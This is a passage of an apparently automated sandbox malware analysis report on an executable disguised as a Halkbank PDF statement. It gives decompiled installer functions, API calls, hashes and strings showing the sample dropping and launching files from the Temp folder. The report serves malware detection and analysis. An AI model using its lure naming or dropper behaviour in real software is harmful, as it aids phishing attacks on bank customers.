                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CloseEnum$DeleteValue
                                          • String ID:
                                          • API String ID: 1354259210-0
                                          • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                          • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                          • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                          0x00401d81
                                          0x00401d85
                                          0x00401d9a
                                          0x00401d87
                                          0x00401d89
                                          0x00401d8f
                                          0x00401d8f
                                          0x00401da0
                                          0x00401da3
                                          0x00401dad
                                          0x00401db0
                                          0x00401db8
                                          0x00401dc9
                                          0x00401dcc
                                          0x00401dd7
                                          0x00401dce
                                          0x00401dd0
                                          0x00401dd0
                                          0x00401ddb
                                          0x00401de5
                                          0x00401e0c
                                          0x00401e1b
                                          0x00401e29
                                          0x00401e31
                                          0x00401e39
                                          0x00401e39
                                          0x00401e42
                                          0x00401e48
                                          0x00402ba4
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                          • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                          • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                          • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                          0x00401e4e
                                          0x00401e59
                                          0x00401e5b
                                          0x00401e68
                                          0x00401e7f
                                          0x00401e84
                                          0x00401e91
                                          0x00401e96
                                          0x00401e9a
                                          0x00401ea5
                                          0x00401eac
                                          0x00401ebe
                                          0x00401ec4
                                          0x00401ec9
                                          0x00401ed3
                                          0x00402638
                                          0x0040156d
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • GetDC.USER32(?), ref: 00401E51
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                          • ReleaseDC.USER32 ref: 00401E84
                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                          • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2584051700-0
                                          • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                          • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                          • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                          0x00401c43
                                          0x00401c45
                                          0x00401c4c
                                          0x00401c4f
                                          0x00401c52
                                          0x00401c5c
                                          0x00401c60
                                          0x00401c63
                                          0x00401c6c
                                          0x00401c6c
                                          0x00401c6f
                                          0x00401c73
                                          0x00401c7c
                                          0x00401c7c
                                          0x00401c7f
                                          0x00401c83
                                          0x00401c85
                                          0x00401cda
                                          0x00401cdc
                                          0x00401ce7
                                          0x00401cf1
                                          0x00401cf4
                                          0x00401cf4
                                          0x00401cfd
                                          0x00000000
                                          0x00401c87
                                          0x00401c8e
                                          0x00401c90
                                          0x00401c93
                                          0x00401c99
                                          0x00401ca0
                                          0x00401ca3
                                          0x00401ccb
                                          0x00401d03
                                          0x00401d03
                                          0x00401ca5
                                          0x00401cb3
                                          0x00401cbb
                                          0x00401cbe
                                          0x00401cbe
                                          0x00401ca3
                                          0x00401d06
                                          0x00401d09
                                          0x00401d0f
                                          0x00402ba4
                                          0x00402ba4
                                          0x00402c2d
                                          0x00402c39

                                          APIs
                                          • SendMessageTimeoutW.USER32 ref: 00401CB3
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                          • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                          • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                          • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                          0x00406544
                                          0x00406546
                                          0x0040655b
                                          0x0040655e
                                          0x00406563
                                          0x00406568
                                          0x004065a6
                                          0x004065a6
                                          0x0040656a
                                          0x0040657c
                                          0x00406587
                                          0x0040658d
                                          0x00406598
                                          0x00000000
                                          0x00000000
                                          0x00406598
                                          0x004065ac

                                          APIs
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,?,?,0040679D,80000002), ref: 0040657C
                                          • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,00422728), ref: 00406587
                                          Strings
                                          • ('B, xrefs: 0040655B
                                          • "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf, xrefs: 0040653D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$('B
                                          • API String ID: 3356406503-2239141053
                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                          • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                          0x00405f38
                                          0x00405f45
                                          0x00405f46
                                          0x00405f51
                                          0x00405f59
                                          0x00405f59
                                          0x00405f61

                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-3916508600
                                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                          • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                          0x00405642
                                          0x0040564c
                                          0x00405668
                                          0x0040568a
                                          0x0040568d
                                          0x00405693
                                          0x0040569d
                                          0x0040569e
                                          0x004056a0
                                          0x004056a6
                                          0x004056a6
                                          0x004056b0
                                          0x00000000
                                          0x004056be
                                          0x00405675
                                          0x004056ad
                                          0x004056ad
                                          0x00000000
                                          0x004056ad
                                          0x00405681
                                          0x00405683
                                          0x00000000
                                          0x00405683
                                          0x00405652
                                          0x00000000
                                          0x00000000
                                          0x00405659
                                          0x00000000

                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0040566D
                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                            • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                          • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                          • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                          • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                          0x00405f84
                                          0x00405f8e
                                          0x00405f91
                                          0x00405f97
                                          0x00405f98
                                          0x00405f99
                                          0x00405fa1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405fa1
                                          0x00405fa3
                                          0x00405fab

                                          APIs
                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-1669384263
                                          • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                          • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                          • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                          • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
